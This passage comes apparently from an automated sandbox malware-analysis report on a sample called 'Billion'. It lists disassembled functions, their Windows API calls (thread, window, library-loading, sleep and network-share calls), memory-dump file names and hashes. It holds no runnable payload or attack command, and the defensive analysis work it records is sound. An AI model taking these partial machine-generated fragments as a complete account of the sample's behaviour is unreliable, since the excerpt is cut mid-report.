                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0019EB14
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0019EB47
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0019EB5D
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0019EB64
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 45b891f30238d79d66ec5792c68bb4b471ed666a27735c600685e601f935e785
                                                                                                                                                                                                                                                                                                          • Instruction ID: b403f525cb954e326aa8636fb2e6ece572caec06e326f762affc221c96a66167
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45b891f30238d79d66ec5792c68bb4b471ed666a27735c600685e601f935e785
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A11C876900258BBCB01DBA8EC09E9E7FADAB45320F144266F816E3291D775C9048761
                                                                                                                                                                                                                                                                                                          Function 0015D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,0015D369,00000000,00000004,00000000), ref: 0015D588
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0015D594
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0015D59B
                                                                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 0015D5B9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0df975a74a137fc89054720a431685e57c5534dfcdcb30b0b998bc89d7bc5815
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c6d3643fc304bba35f5e82e1960f690af032f1ad99cc7de9aa37586e974dcfd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df975a74a137fc89054720a431685e57c5534dfcdcb30b0b998bc89d7bc5815
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0901C472411214EBDB316FA5FC09FAA7B69EF41736F100229FD358A1E0EB708849C7A1
                                                                                                                                                                                                                                                                                                          Function 00137873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dbb90292d37844f966b7c6bf8a0fa9aba7a658abbeb6b66cf25ab845f9380948
                                                                                                                                                                                                                                                                                                          • Instruction ID: ee68b0f06f60e9c2d66ea4311a1ce34a9184da583f7a3079aadbde966581fa9f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb90292d37844f966b7c6bf8a0fa9aba7a658abbeb6b66cf25ab845f9380948
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A11C4B2505608BFDF165F90DC58EEABF69FF08354F040125FA0852150D731DCA0EBA0
                                                                                                                                                                                                                                                                                                          Function 001633E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue), ref: 00163418
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue,001D3260,FlsSetValue,00000000,00000364,?,001631B9), ref: 00163424
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue,001D3260,FlsSetValue,00000000), ref: 00163432
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 509c827343d23ff205fff5c72aebeb38d06308ae06f1f219e7908dda22e45442
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1109682f2bb2b568f6fbb99013044b4412bdaa12b7641d1f86f15087a1050b15
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 509c827343d23ff205fff5c72aebeb38d06308ae06f1f219e7908dda22e45442
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76018432A122229BCB224B79AC44D56BB58FF15BB17220630F926D7681DB20DD51C6E0
                                                                                                                                                                                                                                                                                                          Function 0019BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BA8B
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BAB0
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BABA
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BAED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 444fa8db81ef3336b0860504c715a552638005b688762f9cf90c2b612e9b60e0
                                                                                                                                                                                                                                                                                                          • Instruction ID: e0c45b60ef4fefbf72d779d58568ea7be51faf434e5557d1ef3fd26cf4d32617
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 444fa8db81ef3336b0860504c715a552638005b688762f9cf90c2b612e9b60e0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5113C71C04519E7CF04AFE5FA89AEEBB78BF09711F124095D541B3580CB309650CBA5
                                                                                                                                                                                                                                                                                                          Function 001C886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C888E
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C88A6
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C88CA
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C88E5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3a0931513b1565392ed87e1406fcf7447f0d00014ff8dbc8c77e2895eaf188b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 15fdb183d581b981c0027f9c210b91d3660ceca2d9550441892a1351227da811
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a0931513b1565392ed87e1406fcf7447f0d00014ff8dbc8c77e2895eaf188b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 351140B9D00219AFDB41CFA8D884AEEBBB5FB08310F508166E915E2650E735AA94CF50
                                                                                                                                                                                                                                                                                                          Function 001936F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00193712
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00193723
                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0019372A
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00193731
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b2e81fc5204de66e208bb502d9b1bb8a8c3f726975e38caf92d65ef106733d1c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b8c6fbf10f73baefb971acdef2d3d1a4a480aa9506aab347ac1f956c320b6f1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e81fc5204de66e208bb502d9b1bb8a8c3f726975e38caf92d65ef106733d1c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE092B11012347BDF2417A2AC4EEEBBF6CDF42BA1F400025F105D2480DBB0C981C2B0
                                                                                                                                                                                                                                                                                                          Function 001C92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00131F87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131F96
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: BeginPath.GDI32(?), ref: 00131FAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131FD6
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001C92E3
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 001C92F0
                                                                                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 001C9300
                                                                                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001C930E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f0928f6660e952a3a51b054fbbc98b1b14899d2ca74d3a49e569e60cbcb3b4ff
                                                                                                                                                                                                                                                                                                          • Instruction ID: c8b3deb11d7b54191619f402b7b993cc9c63ca0d672f80bbdf24c22a9aa8d79e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0928f6660e952a3a51b054fbbc98b1b14899d2ca74d3a49e569e60cbcb3b4ff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF05E32005258BADB125F58BC0EFCE3F69AF1A320F148005FA11214E2C775D566DBA5
                                                                                                                                                                                                                                                                                                          Function 001321A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 001321BC
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 001321C6
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 001321D9
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 001321E1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9b38400f126d6e43721b5e82f3a41f989c2eea87922d3fe72191ae2422a986
                                                                                                                                                                                                                                                                                                          • Instruction ID: 716064f7c11ea9368ca908e6c04956c6e9c084e72e42747214db92d6fbfb1550
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9b38400f126d6e43721b5e82f3a41f989c2eea87922d3fe72191ae2422a986
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E0E531240640AEDB215B74BC09FE97F61AB15735F18C229F7B9544E0C771C685AB11
                                                                                                                                                                                                                                                                                                          Function 0018EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018EC36
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0018EC40
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0018EC60
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0018EC81
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e08628b8a6100b0e94575a311e7b518efb7a5d763e0f603267d2f3f217bbc173
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f1eb6679d129a415a113b282bb74c0754da7a6e8ad3e9bc76cdf367508b73fc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e08628b8a6100b0e94575a311e7b518efb7a5d763e0f603267d2f3f217bbc173
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E0E5B0800214EFCB40AFA0A908E5DBFF1BB18310F108469F84AE3650C7389982DF00
                                                                                                                                                                                                                                                                                                          Function 0018EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018EC4A
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0018EC54
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0018EC60
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0018EC81
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ef994b2292b9d08cb9cc439aed5cdf0765f27f544a0990ad675da5174fa27627
                                                                                                                                                                                                                                                                                                          • Instruction ID: 79db878f3b9a17053c386529f8f28fe5ccd1e8ef884d372cad02ae7d45ed1ed0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef994b2292b9d08cb9cc439aed5cdf0765f27f544a0990ad675da5174fa27627
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E012B0C00214EFCF409FA0E808A5DBFF1BB18310F108469F84AE36A0CB38A982DF00
                                                                                                                                                                                                                                                                                                          Function 001A57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001A5919
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
